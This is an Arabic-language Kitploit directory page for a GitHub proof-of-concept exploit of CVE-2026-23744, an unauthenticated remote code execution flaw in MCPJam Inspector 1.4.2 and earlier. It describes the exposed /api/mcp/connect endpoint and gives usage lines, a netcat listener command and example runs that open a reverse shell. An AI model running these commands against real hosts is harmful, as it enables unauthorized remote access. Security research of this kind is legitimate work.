Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — استغلال لإثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في MCPJam Inspector <= 1.4.2. | Kitploit
أدوات/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — استغلال لإثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في MCPJam Inspector <= 1.4.2.

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 — ثغرة تنفيذ أوامر عن بُعد غير مصادقة في MCPJam Inspector

Python CVE Platform

MCPJam Inspector <= 1.4.2 يرتبط بـ 0.0.0.0 افتراضيًا ويكشف عن /api/mcp/connect بدون أي مصادقة. تقبل نقطة النهاية كائن serverConfig يقوم بتشغيل عملية مباشرة على المضيف — وتمرير حمولة صدفة عكسية يمنح RCE فوريًا دون الحاجة إلى أي بيانات اعتماد.


المتطلبات

pip install requests

الاستخدام

python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
المفتاحالوصفالافتراضي
-uرابط الهدفمطلوب
-iعنوان IP للمستمع الخاص بك (LHOST)مطلوب
-pمنفذ المستمع الخاص بك (LPORT)مطلوب
-mطريقة الحمولة: busybox, bash, python3busybox

مثال على الصدفة العكسية

الخطوة 1 — شغّل المستمع الخاص بك:

nc -lvnp 4444

الخطوة 2 — نفّذ الاستغلال:

# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

طرق الحمولة

إذا لم يعمل busybox على الهدف، جرّب الطرق الأخرى:

# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

الإصدارات المتأثرة

البرنامجالمتأثرالمُصلَح
MCPJam Inspector<= 1.4.21.4.3

المراجع

  • متتبع CVE من CrowdSec — CVE-2026-23744
  • MCPJam Inspector على GitHub
تنزيل الأداة